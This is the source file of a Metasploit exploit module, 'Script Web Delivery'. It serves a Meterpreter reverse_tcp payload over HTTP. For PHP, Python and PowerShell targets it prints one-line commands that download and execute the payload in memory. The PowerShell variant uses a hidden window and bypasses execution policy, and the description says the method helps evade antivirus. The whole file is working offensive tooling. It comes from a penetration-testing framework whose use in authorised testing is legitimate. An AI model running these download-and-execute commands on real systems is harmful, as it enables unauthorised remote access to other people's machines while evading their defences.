metasploit-framework/modules/exploits/multi/script/web_delivery.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'		 => 'Script Web Delivery',
      'Description'	 => %q{
        This module quickly fires up a web server that serves a payload.
        The provided command will start the specified scripting langauge interpreter and then download and execute the
        payload. The main purpose of this module is to quickly establish a session on a target
        machine when the attacker has to manually type in the command himself, e.g. Command Injection,
        RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
        write to disk so is less likely to trigger AV solutions and will allow privilege
        escalations supplied by Meterpreter.
      },
      'License'	 => MSF_LICENSE,
      'Author'	 =>
        [
          'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
        ],
      'DefaultOptions' =>
                                {
                                    'Payload' => 'python/meterpreter/reverse_tcp'
                                },
      'References'	 =>
        [
          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
        ],
      'Platform'       => %w{ py php win},
      'Targets'        =>
        [
          ['Python_win', {
            'Platform' => 'py',
            'Arch' => ARCH_PYTHON
          }],
          ['Python_linux', {
            'Platform' => 'py',
            'Arch' => ARCH_PYTHON
          }],
          ['PHP_win', {
            'Platform' => 'php',
            'Arch' => ARCH_PHP
          }],
          ['PHP_linux', {
            'Platform' => 'php',
            'Arch' => ARCH_PHP
          }],
          ['PSH_x86', {
            'Platform' => 'win',
            'Arch' => ARCH_X86
          }],
          ['PSH_x64', {
            'Platform' => 'win',
            'Arch' => ARCH_X86_64
          }],


        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'N/A'
       ))
      end

  def on_request_uri(cli, request)
    print_status("Delivering Payload")
    if (target.name.include? "PSH")
        data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
    else
        data = %Q|#{payload.encoded} |
    end
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end

  def primer
    url = get_uri()
    print_status("Run the following command on the target machine:")
    if (target.name == "PHP_linux")
        print_line("php -r \"eval(file_get_contents('#{url}'));\"")
    elsif (target.name == "PHP_win")    
        print_line("php.exe -r \"eval(file_get_contents('#{url}'));\"")
    elsif (target.name == "Python_linux")
        print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
    elsif (target.name == "Python_win")    
        print_line("python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
    else
        download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
        print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
    end
  end
 end